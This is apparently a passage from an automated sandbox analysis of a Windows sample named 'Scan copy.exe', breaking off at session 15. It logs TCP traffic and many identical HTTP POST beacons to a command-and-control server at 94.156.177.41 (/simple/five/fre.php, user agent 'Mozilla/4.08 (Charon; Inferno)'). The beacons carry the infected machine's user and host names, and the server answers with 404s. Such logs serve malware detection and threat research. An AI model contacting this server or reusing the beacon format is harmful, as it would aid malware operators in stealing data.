Nov 28, 2024 09:16:02.647028923 CET	49982	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:16:02.767209053 CET	80	49982	94.156.177.41	192.168.2.7
Nov 28, 2024 09:16:02.767339945 CET	49982	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:16:02.769401073 CET	49982	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:16:02.889365911 CET	80	49982	94.156.177.41	192.168.2.7
Nov 28, 2024 09:16:02.889650106 CET	49982	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:16:03.010974884 CET	80	49982	94.156.177.41	192.168.2.7
Nov 28, 2024 09:16:04.174340963 CET	80	49982	94.156.177.41	192.168.2.7
Nov 28, 2024 09:16:04.174396038 CET	80	49982	94.156.177.41	192.168.2.7
Nov 28, 2024 09:16:04.174439907 CET	49982	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:16:04.174479008 CET	49982	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:16:04.294475079 CET	80	49982	94.156.177.41	192.168.2.7
Nov 28, 2024 09:16:04.340342999 CET	49987	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:16:04.460654020 CET	80	49987	94.156.177.41	192.168.2.7
Nov 28, 2024 09:16:04.464869022 CET	49987	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:16:04.467031956 CET	49987	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:16:04.587042093 CET	80	49987	94.156.177.41	192.168.2.7
Nov 28, 2024 09:16:04.587141991 CET	49987	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:16:04.707226038 CET	80	49987	94.156.177.41	192.168.2.7
Nov 28, 2024 09:16:06.009777069 CET	80	49987	94.156.177.41	192.168.2.7
Nov 28, 2024 09:16:06.009910107 CET	49987	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:16:06.009932041 CET	80	49987	94.156.177.41	192.168.2.7
Nov 28, 2024 09:16:06.009978056 CET	49987	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:16:06.130177975 CET	80	49987	94.156.177.41	192.168.2.7
Nov 28, 2024 09:16:06.144771099 CET	49990	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:16:06.266752005 CET	80	49990	94.156.177.41	192.168.2.7
Nov 28, 2024 09:16:06.266863108 CET	49990	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:16:06.268991947 CET	49990	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:16:06.388945103 CET	80	49990	94.156.177.41	192.168.2.7
Nov 28, 2024 09:16:06.389002085 CET	49990	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:16:06.508910894 CET	80	49990	94.156.177.41	192.168.2.7
Nov 28, 2024 09:16:07.709157944 CET	80	49990	94.156.177.41	192.168.2.7
Nov 28, 2024 09:16:07.709243059 CET	80	49990	94.156.177.41	192.168.2.7
Nov 28, 2024 09:16:07.709409952 CET	49990	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:16:07.709409952 CET	49990	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:16:07.829416990 CET	80	49990	94.156.177.41	192.168.2.7
Nov 28, 2024 09:16:07.853251934 CET	49995	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:16:07.973280907 CET	80	49995	94.156.177.41	192.168.2.7
Nov 28, 2024 09:16:07.973498106 CET	49995	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:16:07.975691080 CET	49995	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:16:08.095727921 CET	80	49995	94.156.177.41	192.168.2.7
Nov 28, 2024 09:16:08.095796108 CET	49995	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:16:08.215810061 CET	80	49995	94.156.177.41	192.168.2.7
Nov 28, 2024 09:16:09.414546013 CET	80	49995	94.156.177.41	192.168.2.7
Nov 28, 2024 09:16:09.414577961 CET	80	49995	94.156.177.41	192.168.2.7
Nov 28, 2024 09:16:09.414885998 CET	49995	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:16:09.414885998 CET	49995	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:16:09.534938097 CET	80	49995	94.156.177.41	192.168.2.7
Nov 28, 2024 09:16:09.555291891 CET	50000	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:16:09.675334930 CET	80	50000	94.156.177.41	192.168.2.7
Nov 28, 2024 09:16:09.675451994 CET	50000	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:16:09.677831888 CET	50000	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:16:09.797740936 CET	80	50000	94.156.177.41	192.168.2.7
Nov 28, 2024 09:16:09.797792912 CET	50000	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:16:09.917742014 CET	80	50000	94.156.177.41	192.168.2.7
Nov 28, 2024 09:16:11.218923092 CET	80	50000	94.156.177.41	192.168.2.7
Nov 28, 2024 09:16:11.218976974 CET	80	50000	94.156.177.41	192.168.2.7
Nov 28, 2024 09:16:11.219183922 CET	50000	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:16:11.219247103 CET	50000	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:16:11.339205027 CET	80	50000	94.156.177.41	192.168.2.7
Nov 28, 2024 09:16:11.371793985 CET	50004	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:16:11.491756916 CET	80	50004	94.156.177.41	192.168.2.7
Nov 28, 2024 09:16:11.491847992 CET	50004	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:16:11.494457006 CET	50004	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:16:11.614347935 CET	80	50004	94.156.177.41	192.168.2.7
Nov 28, 2024 09:16:11.614597082 CET	50004	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:16:11.734586954 CET	80	50004	94.156.177.41	192.168.2.7
Nov 28, 2024 09:16:13.036164045 CET	80	50004	94.156.177.41	192.168.2.7
Nov 28, 2024 09:16:13.036325932 CET	80	50004	94.156.177.41	192.168.2.7
Nov 28, 2024 09:16:13.036489010 CET	50004	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:16:13.049462080 CET	50004	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:16:13.169394016 CET	80	50004	94.156.177.41	192.168.2.7
Nov 28, 2024 09:16:13.199317932 CET	50009	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:16:13.319334984 CET	80	50009	94.156.177.41	192.168.2.7
Nov 28, 2024 09:16:13.322861910 CET	50009	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:16:13.324951887 CET	50009	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:16:13.445076942 CET	80	50009	94.156.177.41	192.168.2.7
Nov 28, 2024 09:16:13.446835995 CET	50009	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:16:13.566925049 CET	80	50009	94.156.177.41	192.168.2.7
Nov 28, 2024 09:16:14.719775915 CET	80	50009	94.156.177.41	192.168.2.7
Nov 28, 2024 09:16:14.719919920 CET	80	50009	94.156.177.41	192.168.2.7
Nov 28, 2024 09:16:14.719923019 CET	50009	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:16:14.720005989 CET	50009	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:16:14.840153933 CET	80	50009	94.156.177.41	192.168.2.7
Nov 28, 2024 09:16:14.868438005 CET	50012	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:16:14.988678932 CET	80	50012	94.156.177.41	192.168.2.7
Nov 28, 2024 09:16:14.988894939 CET	50012	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:16:14.991100073 CET	50012	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:16:15.111128092 CET	80	50012	94.156.177.41	192.168.2.7
Nov 28, 2024 09:16:15.111181974 CET	50012	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:16:15.231086016 CET	80	50012	94.156.177.41	192.168.2.7
Nov 28, 2024 09:16:16.432226896 CET	80	50012	94.156.177.41	192.168.2.7
Nov 28, 2024 09:16:16.432446003 CET	80	50012	94.156.177.41	192.168.2.7
Nov 28, 2024 09:16:16.432518959 CET	50012	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:16:16.432564974 CET	50012	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:16:16.552479982 CET	80	50012	94.156.177.41	192.168.2.7

HTTP Request Dependency Graph

94.156.177.41

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.7	49703	94.156.177.41	80	7380	C:\Users\user\Desktop\Scan copy.exe

Timestamp	Bytes transferred	Direction	Data
Nov 28, 2024 09:14:14.976162910 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 192 Connection: close
Nov 28, 2024 09:14:15.096111059 CET	192	OUT	Data Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 37 00 35 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: 'ckav.rufrontdesk841675FRONTDESK-PCk0FDD42EE188E931437F4FBE2CFEjoC
Nov 28, 2024 09:14:16.412965059 CET	185	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Thu, 28 Nov 2024 08:14:16 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.7	49705	94.156.177.41	80	7380	C:\Users\user\Desktop\Scan copy.exe

Timestamp	Bytes transferred	Direction	Data
Nov 28, 2024 09:14:16.735785007 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 192 Connection: close
Nov 28, 2024 09:14:16.856131077 CET	192	OUT	Data Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 37 00 35 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: 'ckav.rufrontdesk841675FRONTDESK-PC+0FDD42EE188E931437F4FBE2C1aESK
Nov 28, 2024 09:14:18.371232033 CET	185	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Thu, 28 Nov 2024 08:14:18 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.7	49707	94.156.177.41	80	7380	C:\Users\user\Desktop\Scan copy.exe

Timestamp	Bytes transferred	Direction	Data
Nov 28, 2024 09:14:18.577112913 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 165 Connection: close
Nov 28, 2024 09:14:18.697510958 CET	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 37 00 35 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk841675FRONTDESK-PC0FDD42EE188E931437F4FBE2C
Nov 28, 2024 09:14:19.966336966 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Thu, 28 Nov 2024 08:14:19 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.7	49709	94.156.177.41	80	7380	C:\Users\user\Desktop\Scan copy.exe

Timestamp	Bytes transferred	Direction	Data
Nov 28, 2024 09:14:20.231441021 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 165 Connection: close
Nov 28, 2024 09:14:20.351381063 CET	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 37 00 35 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk841675FRONTDESK-PC0FDD42EE188E931437F4FBE2C
Nov 28, 2024 09:14:21.741441965 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Thu, 28 Nov 2024 08:14:21 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.7	49710	94.156.177.41	80	7380	C:\Users\user\Desktop\Scan copy.exe

Timestamp	Bytes transferred	Direction	Data
Nov 28, 2024 09:14:22.036772966 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 165 Connection: close
Nov 28, 2024 09:14:22.160779953 CET	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 37 00 35 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk841675FRONTDESK-PC0FDD42EE188E931437F4FBE2C
Nov 28, 2024 09:14:23.475658894 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Thu, 28 Nov 2024 08:14:23 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.7	49716	94.156.177.41	80	7380	C:\Users\user\Desktop\Scan copy.exe

Timestamp	Bytes transferred	Direction	Data
Nov 28, 2024 09:14:23.740595102 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 165 Connection: close
Nov 28, 2024 09:14:23.860631943 CET	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 37 00 35 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk841675FRONTDESK-PC0FDD42EE188E931437F4FBE2C
Nov 28, 2024 09:14:25.137492895 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Thu, 28 Nov 2024 08:14:24 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.7	49722	94.156.177.41	80	7380	C:\Users\user\Desktop\Scan copy.exe

Timestamp	Bytes transferred	Direction	Data
Nov 28, 2024 09:14:25.399589062 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 165 Connection: close
Nov 28, 2024 09:14:25.519659042 CET	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 37 00 35 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk841675FRONTDESK-PC0FDD42EE188E931437F4FBE2C
Nov 28, 2024 09:14:27.269006014 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Thu, 28 Nov 2024 08:14:27 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.7	49730	94.156.177.41	80	7380	C:\Users\user\Desktop\Scan copy.exe

Timestamp	Bytes transferred	Direction	Data
Nov 28, 2024 09:14:27.547003031 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 165 Connection: close
Nov 28, 2024 09:14:27.668725014 CET	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 37 00 35 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk841675FRONTDESK-PC0FDD42EE188E931437F4FBE2C
Nov 28, 2024 09:14:28.997591019 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Thu, 28 Nov 2024 08:14:28 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.7	49733	94.156.177.41	80	7380	C:\Users\user\Desktop\Scan copy.exe

Timestamp	Bytes transferred	Direction	Data
Nov 28, 2024 09:14:29.265110016 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 165 Connection: close
Nov 28, 2024 09:14:29.385370016 CET	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 37 00 35 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk841675FRONTDESK-PC0FDD42EE188E931437F4FBE2C
Nov 28, 2024 09:14:30.852818966 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Thu, 28 Nov 2024 08:14:30 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.7	49739	94.156.177.41	80	7380	C:\Users\user\Desktop\Scan copy.exe

Timestamp	Bytes transferred	Direction	Data
Nov 28, 2024 09:14:31.115309000 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 165 Connection: close
Nov 28, 2024 09:14:31.235320091 CET	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 37 00 35 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk841675FRONTDESK-PC0FDD42EE188E931437F4FBE2C
Nov 28, 2024 09:14:32.658634901 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Thu, 28 Nov 2024 08:14:32 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.7	49745	94.156.177.41	80	7380	C:\Users\user\Desktop\Scan copy.exe

Timestamp	Bytes transferred	Direction	Data
Nov 28, 2024 09:14:32.931236029 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 165 Connection: close
Nov 28, 2024 09:14:33.051469088 CET	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 37 00 35 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk841675FRONTDESK-PC0FDD42EE188E931437F4FBE2C
Nov 28, 2024 09:14:34.411667109 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Thu, 28 Nov 2024 08:14:34 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.7	49750	94.156.177.41	80	7380	C:\Users\user\Desktop\Scan copy.exe

Timestamp	Bytes transferred	Direction	Data
Nov 28, 2024 09:14:34.677262068 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 165 Connection: close
Nov 28, 2024 09:14:34.797317028 CET	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 37 00 35 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk841675FRONTDESK-PC0FDD42EE188E931437F4FBE2C
Nov 28, 2024 09:14:36.257673025 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Thu, 28 Nov 2024 08:14:36 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.7	49755	94.156.177.41	80	7380	C:\Users\user\Desktop\Scan copy.exe

Timestamp	Bytes transferred	Direction	Data
Nov 28, 2024 09:14:36.543272972 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 165 Connection: close
Nov 28, 2024 09:14:36.663455963 CET	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 37 00 35 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk841675FRONTDESK-PC0FDD42EE188E931437F4FBE2C
Nov 28, 2024 09:14:38.124994040 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Thu, 28 Nov 2024 08:14:37 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.7	49760	94.156.177.41	80	7380	C:\Users\user\Desktop\Scan copy.exe

Timestamp	Bytes transferred	Direction	Data
Nov 28, 2024 09:14:38.398513079 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 165 Connection: close
Nov 28, 2024 09:14:38.518569946 CET	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 37 00 35 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk841675FRONTDESK-PC0FDD42EE188E931437F4FBE2C
Nov 28, 2024 09:14:39.946322918 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Thu, 28 Nov 2024 08:14:39 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.7	49764	94.156.177.41	80	7380	C:\Users\user\Desktop\Scan copy.exe

Timestamp	Bytes transferred	Direction	Data
Nov 28, 2024 09:14:40.209947109 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 165 Connection: close
Nov 28, 2024 09:14:40.330194950 CET	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 37 00 35 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk841675FRONTDESK-PC0FDD42EE188E931437F4FBE2C
Nov 28, 2024 09:14:41.795125961 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Thu, 28 Nov 2024 08:14:41 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.7	49770	94.156.177.41	80	7380	C:\Users\user\Desktop\Scan copy.exe

Timestamp	Bytes transferred	Direction	Data
Nov 28, 2024 09:14:42.414340973 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 165 Connection: close
